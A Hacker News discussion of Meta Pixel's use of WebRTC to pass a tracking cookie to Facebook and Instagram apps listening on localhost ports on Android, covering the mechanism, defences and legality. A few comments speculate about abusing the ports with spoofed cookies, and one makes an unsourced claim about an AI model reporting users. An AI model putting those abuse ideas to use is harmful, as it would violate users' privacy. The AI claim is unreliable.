On the FB side, I can see a malicious user potentially poisoning a target site visitors’s ad profile or even social media algorithm with crafted cookies. Fill their feed with diaper ads or something.
*: Meta Pixel script was last seen sending via HTTP in Oct 2024, but Facebook and Instagram apps still listen on this port today. They also listen on port 12388 for HTTP, but we have not found any script sending to 12388.
**: Meta Pixel script sends to these ports, but Meta apps do not listen on them (yet?). We speculate that this behavior could be due to slow/gradual app rollout.
So, could some other app send data to these ports with a fake message? I'm asking for a friend that likes to do things for science.
Which, per the OP, the site would be doing by merely including the Meta pixel, which practically every e-commerce and news site does to track its campaigns and organic traffic.
The takeaway is that for all intents and purposes, anything you did in a private session or secondary profile on an Android device with any Meta app installed, was fully connected to your identity in that app for an unknown amount of time. And even with the tracking code deactivated, cookies may still persist on those secondary profiles that still allow for linking future activity.
Yes, but if the concern is not mixing business and personal compartment of the phone, business sites would hopefully not embed a Meta tracking pixel.
> The takeaway is that for all intents and purposes, anything you did in a private session or secondary profile on an Android device with any Meta app installed, was fully connected to your identity
Definitely, and that's a huge problem. I just don't think Android business profiles are a particular concern here; leaking app state to random websites in any profile is the problem.
Or do Android "business profiles" also include browser sessions? Then this would be indeed a cross-compartment leak. I'm not too familiar with Android's compartment model; iOS unfortunately doesn't offer sandboxing between environments that way.
While I agree with your reasoning, in my experience any statement where I prepend "hopefully" usually ends up being the worst possible interpretation in practice.
100% agree, and fingerprinting BYOB devices would be problematic in a lot of ways.
I'm generally against BYOD programs. They're convenient but usually come from a place of allowing employees access to things without the willingness to take on the cost (both in corp devices and inconvenience of a second phone/tablet/whatever) to run them with a high level of assurance.
Much better in my opinion to use something like PagerDuty or text/push notifications to prompt folks to check a corp device if they have alerts/new emails/whatever.
> do Android "business profiles" also include browser sessions
I believe that is typical.
My business profile has it's own instance of Chrome. Mostly used for internal and external sites that require corporate SSO or client certificates. Of course it could be used to browse anything.
webrtc was supposed to be for real-time comms, not fingerprinting people based on what random apps they have running on localhost. the fact that a browser sandbox still leaks this info is wild. like, you’re telling me port 43800 says more about me than a cookie ever could?
and of course, this all runs under the radar—no prompt, no opt-in, just “oh hey, we’re just scanning your machine real quick.” insane. might as well call it metascan™.
kinda makes me nostalgic for simpler times—when tracking meant throwing 200 trackers into a <script> tag and hoping one stuck. now it’s full-on black ops.
i swear, i’m two updates away from running every browser in a docker container inside a faraday cage.
Well, primarily it's the other apps that are saying a lot about you. I think this story emphasises yet again that websites are better for your privacy than apps. (Especially in a browser that has e.g. uBlock Origin, such as Firefox for Android.)
Does the Yandex HTTPS one mean they're shipping the private key for their cert in the app, therefore anything running on localhost (or on a network with poisoned DNS) can spoof the yandexmetrica site?
Yes, but presumably they aren't hosting anything on yandexmetrica.com, so any attackeright as wel register yandexmetrica.net and get an ssl cert for that.
These sites both have the same potential for abuse.
All apps + the web browser being able to communicate freely over a shared localhost interface is such a glaring security hole that I'm surprised both iOS and Android allow it. What even is a legitimate use case for an app starting a local web server?
I expose a LAN accessible status board from an app via HTTP. The app runs completely offline, thus I can't rely on something hosted on the public internet.
My last electron app did effectively the same thing. I took the hosted version of my app and bundled in electron for offline usage with the bundled app being just a normal web application started by electron.
Doesn't iOS prompt you to give apps permission to connect to your local network? "App would like to find and connect to devices on your local network" or something along those lines. I always hit the "no thanks" button.
A long time ago I used it to work around an iOS limitation that prevented apps from simultaneously streaming audio and caching it. You could give the media player a URL for a remote stream, but you couldn’t read the same stream. The alternative was to get the stream yourself and implement your own media player. I didn’t want to write my own media player, so I requested the stream myself in order to cache it, plus fed it back to the
OS media player via localhost http. Total hack, but it worked great. I wonder if they ever took that code out. It’s got hundreds of millions of installs at this point.
A comment I wrote in another HN thread [0] covering this issue:
Web apps talking to LAN resources is an attack vector which is surprisingly still left wide open by browsers these days. uBlock Origin has a filter list that prevents this called "Block Outsider Intrusion into LAN" under the "Privacy" filters [1], but it isn't enabled on a fresh install, it has to be opted into explicitly. It also has some built-in exemptions (visible in [1]) for domains like `figma.com` or `pcsupport.lenovo.com`.
There are some semi-legitimate uses, like Discord using it to check if the app is installed by scanning some high-number ports (6463-6472), but mainly it's used for fingerprinting by malicious actors like shown in the article.
Ebay for example uses port-scanning via a LexisNexis script for fingerprinting (they did in 2020 at least, unsure if they still do), allegedly for fraud prevention reasons [2].
I've contributed some to a cool Firefox extension called Port Authority [3][4] that's explicitly for blocking LAN intruding web requests that shows the portscan attempts it blocks. You can get practically the same results from just the uBlock Origin filter list, but I find it interesting to see blocked attempts at a more granular level too.
That said, both uBlock and Port Authority use WebExtensions' `webRequest` [5] API for filtering HTTP[S]/WS[S] requests. I'm unsure as to how the arcane webRTC tricks mentioned specifically relate to requests exposed to this API; it's possible they might circumvent the reach of available WebExtensions blocking methods, which wouldn't be good.
Yep! Unfortunately its main method (as far as I remember from when I first read the proposal at least, it may do more) is adding preflight requests and headers to opt-in, which works for most cases yet doesn't block behind-the-lines collaborating apps like mentioned in the main article. If there's a listening app (like Meta was caught doing) that's expecting the requests, this doesn't do much to protect you.
EDIT: Looks like it does mention integrating into the permissions system [0], I guess I missed that. Glad they covered that consideration, then!
0. Define 2 blocklists: one for local domains and one for local IP addresses
1. Add a per-origin permission next to the already existing camera, mic, midi, etc... Let's call it LocalNetworkAccess, set it false by default.
2. Add 2 checks in networking stack:
2a. Before DNS resolution check the origins LocalNetworkAccess permission. If false check the URL domain against a domain blocklist, deny the request if matches.
2b. Before the TCP or UDP connect check the the origins LocalNetworkAccess permission. If false check the remote IP address against an IP blocklist, deny the request if matches.
3. If a request was denied, prompt the user to allow or disallow the LocalNetworkAccess permission for the origin, the same way how camera, mic or midi permission is already prompted for.
This is a trivial solution, there is no way this takes more than 2-300 lines of code to implement in any browser engine. Why is it taking years?!
And then of course one can add browser-specific config options to customize the blocklists, but figure that out only after the imminent vulnerability has been fixed.
I agree, yet at least you can kind of see where they're coming from.
I guess a better example would be the automatic hardware detection Lenovo Support offers [0] by pinging a local app (with some clear confirmation dialogs first). Asus seems to do the same thing.
uBlock Origin has a fair few explicit exceptions made [1] for cases like those (and other reasons) in their filter list to avoid breakages (notably Intel domains, the official Judiciary of Germany [2] (???), `figma.com`, `foldingathome.org`, etc).
That's the e-ID function of our personal ID cards (notably, NOT the passports). The user flow is:
1. a client (e.g. the Deutsche Rentenversicherung, Deutschland-ID, Bayern-ID, municipal authorities and a few private sector services as well) wishes to get cryptographically authenticated data about a person (name and address).
2. the web service redirects to Keycloak or another IDP solution
3. the IDP solution calls the localhost port with some details on what exactly is requested, what public key of the service is used, and a matching certificate signed by the Ministry of Interior.
4. The locally installed application ("AusweisApp") now opens and displays these details to the user. When the user wishes to proceed, the user clicks on a "proceed" button, and is then prompted to either insert the ID card into a NFC reader attached to the computer or a smartphone in the same network as the computer that also has the AusweisApp attached.
5. The ID card's chip verifies the certificate as well and asks for a PIN from the user
6. the user enters the PIN
7. the ID card chip now returns the data stored on it
8. the AusweisApp submits an encrypted payload back to the calling IDP
9. the IDP decrypts this data using its private key and redirects back to the actual application.
There is a bunch of cryptography additionally layered in the process that establishes a secure tunnel, but it's too complex to explain here.
In the end, it's a highly secure solution that makes sure that only with the right configuration and conditions being met the ID card actually responds with sensitive information - unlike, say, the Croatian ID card that will go as far as to deliver the picture on the card in digital form to anyone tapping your ID card on their phone. And that's also why it's impossible to implement in any other way - maaaaybe WebUSB but you'd need to ship an entire PC/SC stack and I'm not sure if WebUSB allows cleaving an USB device that already has a driver attached.
In addition, the ID card and the passport also contains an ICAO compliant method of obtaining the data in the MRZ, but I haven't read through the specs of that enough to actually implement this.
IMO browsers should not just block the request but block the whole website with one of those scary giant red banners if something like this is attempted. If all websites get for trying to work around privacy protections is that their attempts might not succeed then there is little incentive not to try.
I built a little lan tool https://router.fyi that tries to get LAN data for a sort of online-nmap.
depending on your browser, it's sometimes capable of finding wifi printers and a couple other smart home devices i've manually added.
Of course the ID was easy to abuse, and I assume Google knew this, and also knew they'd need to have rules against abuse... and that they'd need to back up the rules with penalties, like Play Store permaban, legal action for damages, and maybe even referral for criminal investigation (CFAA violation?).
Unfortunately, even if they did have such rules, in this case, Meta is a too-big-to-deplatform tech company.
(Also, even if it wasn't Meta, sketchy behavior of tech might have the secret endorsement of IC and/or LE. So, making the sketchiness stop could be difficult, and also difficult to talk about.)
Google and Apple are owning their whole operating systems. They can do tracking directly in 50 different ways. Other corporations routinely renegotiate deals on sharing the user surveillance data with them, for big big money. So it all has already been paid for, and authorised. The only problem is that some stupid serfs are still making a fuss over it.
If I recall correctly Figma uses it to connect to the locally installed app, and Discord definitely uses it to check if its desktop app is installed by scanning ports (6463-6472).
I'm aware of two blockers for LAN intrusions from public internet domains, uBlock Origin has a filter list called "Block Outsider Intrusion into LAN" [0] under the "Privacy" filters, and there's a cool Firefox extension called Port Authority [1][2] that does pretty much the same thing yet more specifically targeted and without the exclusions allowed by the uBlock filterlist (stuff like Figma's use is allowed through, as you can see in [0]). I've contributed some to Port Authority, too :)
There are surely other ways to achieve this. If you are logged into an app and the site at tbe same time they can use the server to communicate. Discord doesn't need to know if the app is installed to work. That sounds sketchy.
It's just a way to ensure you open the desired context on a local Discord instance, not any instance that might be logged in to your account. I have a few personal computers logged in on Discord on the same account that could be active at the same time for example.
A commenter mentioned [1] that major Russian apps now all ask for permission to read a unique device ID to deanonymize users. The people that stopped Intel from adding such an ID to their CPUs had perfect foresight [2] (too bad later Intel added it anyway). But then it's not hard to guess that if you include a feature whose purpose is to attack the user, it will be used to attack the user.
Probably hard to do for many but the solution seems be not to have their apps installed. It’s crazy to me that people tolerate FB et al on their devices where you have absolutely no control over what they’re doing.
I agree wrt Facebook, but there’s a long tail of useful apps-that-should-be-websites; 1 click for an app versus 45 seconds searching through tabs and re-logging in (etc) can be meaningful, especially when there are fifty of them.
My healthcare provider recently yanked the mobile version of their portal website, and forces users to download their app. Personally, I see the security angle, but still feel like it’s a punch in the face and so I just went back to paper billing and using a PC for healthcare stuff. More of this is coming, I suspect.
Possible, but potentially not as practical due to the iOS’ restrictive background process model. There, background tasks are generally expected to quickly do whatever it is they need to and exit and generally can’t run indefinitely. Periodic tasks are scheduled by the OS, with scheduling requests from apps being more likely to be honored if their processes are well-behaved (quick, low resource, don’t crash, and don’t run too frequently) with badly-behaved processes getting run less often.
Apps that keep themselves open by reporting that they’re playing audio might be able to work around this, but it’d still be spotty since users frequently play media which would suspended those backgrounded apps and eventually bump them out of memory.
A quite obvious attack mechanism, I'm surprised browsers permitted this in the first place. I can't think of a reason to STUN/TURN to localhost. Aside from localhost, trackers can also use all other IP addresses available to the browser to bind their apps/send traffic to.
Now that the mechanism is known (and widely implemented), one could write an app to notify users about attempted tracking. All you need to do is to open the listed UDP ports and send a notification when UDP traffic comes in.
For shit and giggles I was pondering if it was possible to modify Android to hand out a different, temporary IPv6 address to every app and segment off any other interface that might be exposed just because of shit like this (and use CLAT or some fallback mechanism for IPv4 connectivity). I thought this stuff was just a theoretical problem because it would be silly to be so blatant about tracking, but Facebook proves me wrong once again.
I hope EU regulators take note and start fining the websites that load these trackers without consent, but I suspect they won't have the capacity to do it.
> hand out a different, temporary IPv6 address to every app and segment off any other interface that might be expose
Yes, but (AFAIK) not out of the box (unless one of the security focused ROMs already supports this). The kernel supports network namespaces and there's plenty of documentation available explaining how to make use of those. However I don't know if typical android ROMs ship with the necessary tooling.
Approximately, you'd just need to patch the logic where zygote changes the PID to also configure and switch to a network namespace.
I've looked into network namespaces a bit but from what I can tell you need to do a lot of manual routing and other weird stuff to actually make IPv6 addresses reachable through them.
In theory all you need to do is have zygote constrain the app further with a network namespaces, and run a CLAT daemon for legacy networks, but in practice I'm not sure if that approach works well with 200 apps that each need their IPs rotated regularly.
Plus, you'd need to reconfigure the sandbox when switching between WiFi/5G/ethernet. Not impossible to overcome, but not the weekend project I'd hoped it would be.
I don't follow? Your system is either routing packets or not. IPv6 vs IPv4 should not be a notable difference here.
I've never tested network namespace scalability on a mobile device but I doubt a few hundred of them should break anything (famous last words).
In the primary namespace you will need to configure some very basic routing. You will also need a solution for assigning IP addresses. That solution needs to be able to rotate IP assignments when the external IP block changes. That's pretty standard DHCP stuff. On a desktop distro doing the equivalent with systemd-networkd is possible out of the box with only a handful of lines in a config file.
Honestly a lot of Docker network setups are much more complicated than this. The difficult part here is not the networking but rather patching the zygote logic and authoring a custom build of android that incorporates the changes.
"UPDATE: As of June 3rd 7:45 CEST, Meta/Facebook Pixel script is no longer sending any packets or requests to localhost. The code responsible for sending the _fbp cookie has been almost completely removed."
I'm surprised they're allowed to listen on UDP ports, IIRC this requires special permissions?
> The Meta (Facebook) Pixel JavaScript, when loaded in an Android mobile web browser, transmits the first-party _fbp cookie using WebRTC to UDP ports 12580–12585 to any app on the device that is listening on those ports.
Borders on criminal behavior.
Apparently this was a European team of researchers, which would mean that Meta very likely breached the GDPR and ePrivacy Directive. Let's hope this gets very expensive for Meta.
As someone who works for a similar large org, it's just as likely that some low level programmer put it in without much thought, and then this got surfaces to higher up people who didn't know about it and told them to remove it immediately.
It seems incredibly unlikely a low level programmer could come up with this method then get the necessary code into both the tracking pixel served to third party sites and Meta's android apps without some higher ups knowing about it.
Zuckerberg personally signed off on torrenting books for Llama. It would be a particularly dim group of “low level” programmers who did this without trying to first secure some upper level approvals to share the blame once caught.
Hopefully not too late to make it into the lawsuit. Assholes.
I sure hope there's a lawsuit. Over the last ten years, I've gotten over $2,000 in lawsuit settlement checks from Meta, alone.
I have a savings account at one of my banks that I use just for these settlement checks. Sometimes they're just $5. Sometimes they're a lot more. I think the most I ever got was around $500.
It's a little bit here, and a little bit there, but at the rate it's going, in another five years, I'll be able to buy a car with privacy violation money.
> The Meta (Facebook) Pixel JavaScript, when loaded in an Android mobile web browser, transmits the first-party _fbp cookie using WebRTC to UDP ports 12580–12585 to any app on the device that is listening on those ports.
And people on HN dismiss those who choose to browse with Javascript disabled.
There's a reason that the Javascript toggle is listed under the Security tab on Safari.
These companies have demonstrated repeatedly that fines are just the cost of doing business. Doesn't matter if you charge them $1 million or $1 billion. They have still made significantly more than that from the crime.
Yes, preventing the app from running in the background (entirely) would prevent it from listening on a port and collaborating with websites via this exploit.
As for the second part: no, logging out of the apps would not necessarily be enough. The apps can still link all the different web sessions together for surveillance purposes, whether or not they are also linked to an account within the app. Meta famously maintains "shadow profiles" of data not (yet) associated with a user of the service. Plus, the apps can trivially remember who was last logged in.
Unfortunately in modern web uMatrix is just incredibly annoying. Nearly every site breaks for various reasons and often allowing everything in uMatrix still doesn't fix the issue.
Card payments, especially with 3D secure that use iframes, are one of the biggest problems. This often leads to creating new order several times since allowing something + reloading loses the entire flow.
Captchas are also massive pain, probably because they can't fingerprint as well as normally?
Life after having disabled uMatrix completely has been better.
Those extensions are from the same author. I don't know the details but maybe gorhill didn't have the time to maintain uMatrix anymore and added the very minimum uMatrix functionality to uBO and settled for that. Luckily uMatrix keeps working.
Unauthorized access to a computer system. I'm sure if I connected to some port on a computer belonging to Meta without them wanting it, that would be the crime I would be charged with. But somehow if Meta connects to a port on my phone without me agreeing to it, it's not a crime?
What function does Instagram provide with this WebRTC listener besides tracking?
People install Instagram to look at photos and reels, not to help facebook track them better.
If I put a crypto-mining script in a game I don't get to claim "well they installed the app" when people complain. The victims thought they were installing a game, not a crypto-miner.
Here, the victims thought they were installing a photo sharing application, not a tracking relay.
It just wants to make me bin my phone tbh. Thank God for RMS and Linus that at least you can run GNU and Linux on a laptop as there is little left outside the panopticon.
And with all that tracking and spying on me, plus a boatload of voluntarily submitted data, and Facebook still can't/won't show me any relevant advertising. I mean, even from the corpo point of view. Whenever I open my feed to read something, I see a boatload of complete garbage ads. Like, they are neither enticing to me nor they are promoting something corpos may want to shove in my fae so I would remember, like some Coca-Cola or whatever product. But no, they have nothing.
I've just opened my feed in FB and let's see what ads will be today:
Group Dull Men's Club - some garbage meme dump, neither interesting nor selling any product or service.
Women emigrant group - I'm a male and in different location.
Rundown - some NN generated slop about NN industry
Car crash meme group from a different location.
Math picture meme group
LOTR meme group
Photo group with a theme I'm not interested
Repeat of the above
Another meme group
Roland-Garros page - I've never watched tennis or wrote about it. My profile has follows of a different sport pages altogether. None of those rise in the ads.
Another fact/meme group
Repeat
Repeat
Another fact/meme group
Expat group from incorrect location
And so on it goes. Like, who pays for all this junk? Who coordinates targeting? Why do they waste both their and mine capacity for something that useless both for me and Facebook? I would understood if FB had ads of products/services, or something that loosely follows by likes. But what they have is a total 100% miss. It's mindboggling.
I guess the meme group ads are to draw you in, once you follow them they get to push you actual ads and it costs them less because Facebook doesn't charge them, thinking you want to see the group's posts. It must work to some extent.
I'm incredibly glad this isn't occurring in the UK + EU, because GDPR and the huge fines levied against Meta in the past have scared them sufficiently into not doing this kind of behaviour.
I wonder if companies like Wetter Online (from whom we know that they're selling the location data to brokers [0]) or ad service providers which offer libraries do the same.
If it were so, Google should be knowingly be allowing this to happen and be a co-conspirator. I mean, they surveil our devices as if it were their home. Impossible that they're not aware.
All Meta software is spyware. Whether it's an app or a website, they are only in existence for you to be pacified to spend as much time on them as possible so they can hoover up your data. If those apps/websites provide you with anything useful, it is just as a ruse to get more data from you.
To me it's weird that they're willing to misuse browser APIs so blatantly for interprocess communication, when, as I understand it, server-side correlation using a combination of IP, battery level and screen dimensions probably already gets them 95% of the surveillance capability.
Ah yes, and every small Android dev is banned from Play and Admob for tiny unknown reasons, with no recourse or way to communicate with Google. But Meta here probably won't get any problems at all. They should be temporarily banned!
Zero. People who work on ad-tech build ad-tech all day long, that's the entire job.
Seriously, why do you think all of the unquestionable things humanity has built have been built? It's because it's all just part of the job, for somebody.
People working at ad-tech question the things they're building just like the people at McDonalds flipping a burger are questioning the cholesterol levels of their customers. They're not.
except claude was trying to rat out users in their newer trials. in the end, the best whistleblower could end up being the ai… not sure what that says about us though.
I mean, it is kind of a cool work around. There's a lot of motivation in telling someone they can't do something where "hide and watch" is a pretty typical response. The creative thinking that comes up with ideas like this is not something to discourage. It is a shame that the effort is for such a shit purpose, but these "people" are not stupid, and not many other areas offer these kind of challenges.
In the early days of the information revolution, when computers were new and being nerdy was still seen (almost universally) as a bad thing, a very high proportion of computer enthusiasts were people already on the fringes of society, for one reason or another. For a large number of them, hacking was a way to express their preexisting antiestablishment tendencies. For a lot of them, they were also your basic angsty adolescents and young adults rebelling against The Man as soon as they found any way to do so.
As time went on, computers became more mainstream, and lots more people started using them as part of daily life. This didn't mean that the number of antiestablishment computer users or hackers went down—just that they were no longer nearly so high a percentage of the total number of computer users.
So the answer to "what happened to all the hackers fighting for personal freedom and privacy?" is kinda threefold:
1) They never went away. They're still here, at places like the EFF, fighting for our personal freedom and privacy. They're just much less noticeable in a world where everyone uses computers...and where many more of the prominent institutions actually know how to secure their networks.
2) They grew up. Captain Crunch, the famous phreaker, is 82 this year. Steve Wozniak is 74. And while, sure, some people reach that age and still maintain not merely a philosophy, but a practice, of activism, it's much harder to keep up, and even many of those whose principles do not change will shift to methods that stay more within the system (eg, supporting privacy legislation, or even running for office themselves).
3) They went to jail, were "scared straight", or died. The most prominent example of this group is, of course, Aaron Swartz, but many hacktivists will have had run-ins with the law, and of those many of them will have turned their back on the lifestyle to save themselves (even Captain Crunch was arrested and cooperated with the FBI).
Thanks for your thoughts! How can we create more hackers? I think the fear of punishment has really put a damper on things but not sure how that can be avoided.
Hacking isn't about crime. It's about exploration. There are lots of people showing "the youths" how interesting it is to break a lock or go around it. Basically, any time you can make a system do something fun, helpful, or interesting that it wasn't intended to do, that's hacking. You can be 100% law abiding with no fear of punishment and still get the full experience.
Well, note that my conclusion is largely that we have not, in fact, decreased the number of hackers, nor their proportion within the general population—just their proportion within the computer-using population, and that only by adding a large number of non-hackers to that population. I'm skeptical that we can ever increase the proportion of the population that has the hacker mindset much higher than it is without some kind of overall cultural shift (something that's beyond our power to affect).
But it's also unquestionably true that it's much easier to be a "hacker", in the sense we think of from the 1960s-80s, in a time and field where the hardware and software is simpler, more open, and less obfuscated. As such, I think it's probably not helpful to long for those bygone days—especially the "simpler" part—which we are clearly never getting back until and unless we make a breakthrough that is just as revolutionary as the transistor and the microchip were (and I'm skeptical as to whether that's possible, both in terms of what physics allow ever, and in terms of the shape of the corporate landscape now and for the foreseeable future). Honestly, a lot of the things that were possible back then, a lot of the incentive to get into hacking, was stuff that's actually hugely dangerous or invasive. Instead, I think it's better to focus on what we can do to improve the latter two parts of that equation: more open, less obfuscated.
Personally, I would say that the way toward that is pushing for, creating, and working on more open protocols and open standards, and insisting that those be used to enable more interoperability in place of proprietary formats and integration only with other software and hardware from the same company.
Eh. You can have a very comfortable career doing work that still lets you look at yourself in the mirror. You don’t have to choose to burn the world to pay the rent.
Not in this case. If you’re qualified to get a job at a company who will pay you to sell out your neighbor, you’re qualified to get a job with a decent boss who’ll never ask you do to do this kind of thing, pays 90% as much, and is still many times the national average salary.
The alternatives are not doing evil vs starving. They’re getting paid well for doing evil, or getting paid well for doing good or at least neutral.
Also: Meta pauses mobile port tracking tech on Android after researchers cry foul - https://news.ycombinator.com/item?id=44175940 - June 2025 (26 comments)
This is the overall process used by Meta as I understand it, taken from https://localmess.github.io/:
1. User logged into FB or IG app. The app runs in background, and listens for incoming traffic on specific ports.
2. User visits website on the phone's browser, say something-embarassing.com, which happens to have a Meta Pixel embedded. From the article, Meta Pixel is embedded on over 5.8 million websites. Even in In-Cognito mode, they will still get tracked.
3. Website might ask for user's consent depending on location. The article doesn't elaborate, presumably this is the cookie banner that many people automatically accept to get on with their browsing?
4. > The Meta Pixel script sends the _fbp cookie (containing browsing info) to the native Instagram or Facebook app via WebRTC (STUN) SDP Munging.
You won't see this in your browser's dev tools.
5. Through the logged-in app, Meta can now associate the "anonymous" browser activity with the logged-in user. The app relays _fbp info and user id info to Meta's servers.
Also noteworthy:
> This web-to-app ID sharing method bypasses typical privacy protections such as clearing cookies, Incognito Mode and Android's permission controls. Worse, it opens the door for potentially malicious apps eavesdropping on users’ web activity.
> On or around May 17th, Meta Pixel added a new method to their script that sends the _fbp cookie using WebRTC TURN instead of STUN. The new TURN method avoids SDP Munging, which Chrome developers publicly announced to disable following our disclosure. As of June 2, 2025, we have not observed the Facebook or Instagram applications actively listening on these new ports.
> something-embarassing.com,
Depending on the country that you or your family lives in, this could be far worse than embarrassment.
Thank you! This was a powerful reminder of how important it is to be careful with our words and cover all possibilities when commenting, and additionally, holding ourselves to account for our reading. I was a bit stunned at how I just sort of...flitted through? browsed? skimmed?...well, let's put it plainly: irresponsibly claimed to myself to have read and understood this. Meanwhile, I had completely neglected to notice this goes far beyond embarrassment. It's quite damning that I entirely missed that the consequences of someone knowing someones entire browsing history aren't just mere "embarrassment": first, there are plenty of contexts where it could even lead to state activity and my eventual imprisonment. We can even show that some countries punish the family still in a given country for the perceived "sins" (shorthand, i mean violating laws / actions against power, apologies for sloppiness here) of an individual outside the country. I shold have at least thought to acknowledge that it could go beyond embarrassment - your framing may even be too polite, to readers like me, who neglected to consider this.
So main application for WebRTC is de-anonymisation of users (for example getting their local IP address). Why it is not hidden behind permission I don't understand.
The main application for WebRTC is peer to peer data transfer.
I think you can make the argument that it should be behind a permission prompt these days but it's difficult. What would the permission prompt actually say, in easy to understand layman's terms? "This web site would like to transfer data from your computer to another computer in a way that could potentially identify you"? How many users are going to be able to make an informed choice after reading that?
Let it show "Use WebRTC?".
If users don't understand, they click whatever. If the website really needs it to operate, it will explain why before requesting, just like apps do now.
Always aim for a little more knowledgeable users than you think they are.
And specifically, if you're on something-sensitive.com in a private browsing session, it would give you the choice of giving no optional permissions. That choice is better than no choice at all, especially in a world where Meta can be subpoenaed for this tracking data by actors who may be acting unconstitutionally without sufficient oversight.
That feels pretty useless. You might as well do what happens today: enable it by default and allow knowledgable power users to disable it. If it's disabled, show a message to the user explaining why it's needed.
Today there's no way to disable it, I searched through my Firefox Mobile settings. So I'd say it's for very "power" users.
And why enable it by default, why not disable by default?
Also, sibling comments say iOS is already asking for the permission, why not just copy it?
it does exist in `about:config`, which could be made as a UI setting instead:
`media.peerconnectin.enabled`.
on cromite[1], a hardened chromium fork, there is such a setting, both in the settings page, as well as when you click on the lock icon in the address bar.
[1]: https://cromite.org
IIRC the standard mobile firefox version no longer makes about:config available. You need to be on a beta or nightly build to access it.
It is still enabled, just a bit hidden: chrome://geckoview/content/config.xhtml
Why not? How is this different than, say, location access, or microphone access?
I want to be able to configure this per web site, and a permission prompt is a better interface than having an allow/deny list hidden in settings.
Because users understand what “microphone access” entails. “Use WebRTC?” means nothing to the average user.
Fair point, but "cookies" didn't mean anything to the average user either, and "cookie consent" banners are the norm now.
I think very few people would argue that cookie consent banners in the form in which they are the norm are a good thing just like permission prompts for microphone access are.
Mobile apps require location permissions to use Bluetooth right now, even though that's a hard to understand situation for average people.
If a feature can be used to track people, you have to flag it off or else you are just contributing to the tech Big Brother apparatus.
Browser functionality needs a hard segmentation into disparate categories like "pages" and "apps". For example, Pages that you're merely intending to view don't need WebRTC (or really any sort of network access beyond the originating site, and even this is questionable). And you'd only give something App functionality if it was from a trustable source and the intent was to use it as general software. This would go a long way to solving the other fingerprinting security vulnerabilities, because Pages don't need to be using functionality like Canvas, USB, etc.
If it's more profitable for a page to be an app why would people make pages?
It's only "profitable" if people don't bounce at being asked to trust a random news article, or something-embarassing.com, with their personal information. Same as why native Android apps don't just ask for every single permission. People in general do care about their security, they just lack tools to effectively protect it.
When enrolling Yubikeys and similar devices, Firefox sometimes warns "This website requires extra information about your security device which might affect your privacy. Do you want to give this information? Refusing might cause the process to fail."
You can use a similar language for WebRTC.
I wouldn't understand that. Is it getting a manufacturer address to block some devices? Does it use a key to encrypt something? Which "security device? /dev/urandom?
I see that non-technical users can be confused by too much information, but when you omit this even knowledgeable users can't make an informed decision.
You would because there'll be context:
1- You'd be in a page where you'll be enrolling your YubiKey or WebAuthn device. You'll be having your key at hand, or recently plugged in.
2- Your device's LED would be flashing, and you'll be pressing to the button on your device.
3- The warning will pop-up at that moment, asking that question to you. This means the website probably querying for something like the serial number of your key, which increases the security, but reduces your privacy.
With the context at hand, you'd understand that instantly, because the place you are and the thing you're doing perfectly completes the picture, and you're in control of every step during the procedure.
> probably querying for ...
Exactly. You need to infer that, it isn't stated directly.
Same like you need to guess, that "Unable to connect" means connection refused, while "We can’t connect to the server at a" means the DNS request failed. Or does it mean no route to host? Network is unreachable?
I would argue, that (sometimes) the user would be fine to distinguish whether he wants to approve something, but can't because both dialogs state the same wishy-washy message. Even non-technical users (might) eventually learn the proper terms, but they can't if they only get shown meaningless statements.
> Exactly. You need to infer that, it isn't stated directly.
I don't care. The site is doing something unusual. It's evident, it's enough to take a second look and think about it.
> Same like you need to guess, that "Unable to connect" means...
Again, as a layman, I don't care. As a sysadmin, I don't worry, because I can look into in three seconds flat. Also, Unable to Connect comes with its reasons in parantheses all the time.
We should think in simple terms.
> I don't care. The site is doing something unusual. It's evident, it's enough to take a second look and think about it.
Is it enough to do an informed decision?
> Again, as a layman, I don't care.
You do care, whether you mistyped or the network is down. I agree that you probably don't care to distinguish between "network unreachable" and "no route to host" though.
> As a sysadmin
True, but that information was already there and was thrown away.
TFA list tens of thousands of websites using WebRTC for deanonymization. How many websites using it for P2P data transfer can you list?
Any Jitsi deployment?
Let's be clear here. Meta/other sites are abusing the technology TURN/WebRTC for a purpose it was never intended for, way beyond the comfortable confines of innocent hackery, and we all know it.
That's asshole behavior, and worth naming, shaming, and ostracizing over.
> That's asshole behavior, and worth naming, shaming, and ostracizing over.
These exploits are being developed, distributed and orchestrated by Meta. The ”millions of websites” are just hummus recipe content farms using their ad SDKs, and are downstream Zuck in every meaningful interpretation of the term.
Meta has been named and shamed for decades. Shame only works in a society where bad actors are punished by the masses of people that constitute Meta’s products. Doesn’t mean we should stop, only that it’s not enough.
More than that, talking about TURN or WebRTC is really missing the issue. If you lock everything down so that no one can do anything you wouldn't want a malicious actor to be able to do, then no one can do anything.
The real issue is, why are we putting up with having these apps on our devices? Why do we have laws that prohibit you from e.g. using a third party app from a trusted party or with published source code in order to access the Facebook service, instead of the untrustworthy official app which is evidently actual malware?
What laws are you referring to other than Terms of Service which are entirely artificial constructs whisked into existence by service/platform providers? Which will, admittedly, be as draconian and onesided as the courts will allow.
Agree on your first point at a practical level, but from the normative standpoint, it's unforgivable to cross those streams. At the point we're talking about with a service provider desperately wanting to leak IP info for marketability applications of an underlying dataset and using completely unrelated to the task at hand technical primitives to do it, you very clearly have the device doing something the end user doesn't want or intend. The problem is that FAANG have turned the concept of general computing on it's head by making every bloody handset a playground for the programmer with no easily grokkable interface to the user to curtail the worst behavior of technically savvy bad actors. A connection to a TURN server or use of parts of the RTC stack should explain to the user they are about to engage programming intended for real-time communication when it's happening not just once at the beginning when most users would just accept it and ignore it from then on.
10 or so TURN call making notifications in a context where synchronous RTC isn't involved should make it obvious that something nefarious is going on, and would actually give the user insight into what is running on the phone. Something modern devs seem to be allergic to, because it would cause them to have to confront the sketchiness of what they are implementing instead of being transparent with the principle of least surprise.
Modern businesses though would crumble under such a model because they want to hide as much about what they are doing as possible from the customer base/competitors/regulators. >
> What laws are you referring to other than Terms of Service which are entirely artificial constructs whisked into existence by service/platform providers? Which will, admittedly, be as draconian and onesided as the courts will allow.
There are two main ones.
The first is the CFAA, which by its terms would turn those ToS violations into a serious felony, if violations of the ToS means your access is "unauthorized". Courts have been variously skeptical of that interpretation because of its obvious absurdity, but when it's megacorp vs. small business or open source project, you're often not even getting into court because the party trying to interoperate immediately folds. Especially when the penalties are that scary. It's also a worthless piece of legislation because the actual bad things people do after actual unauthorized access are all separately illegal, so the penalty for unauthorized access by itself should be no more than a minor misdemeanor, and then it makes no sense as a federal law because that sort of thing isn't worth a federal prosecutor's time. Which implies we should just get rid of it.
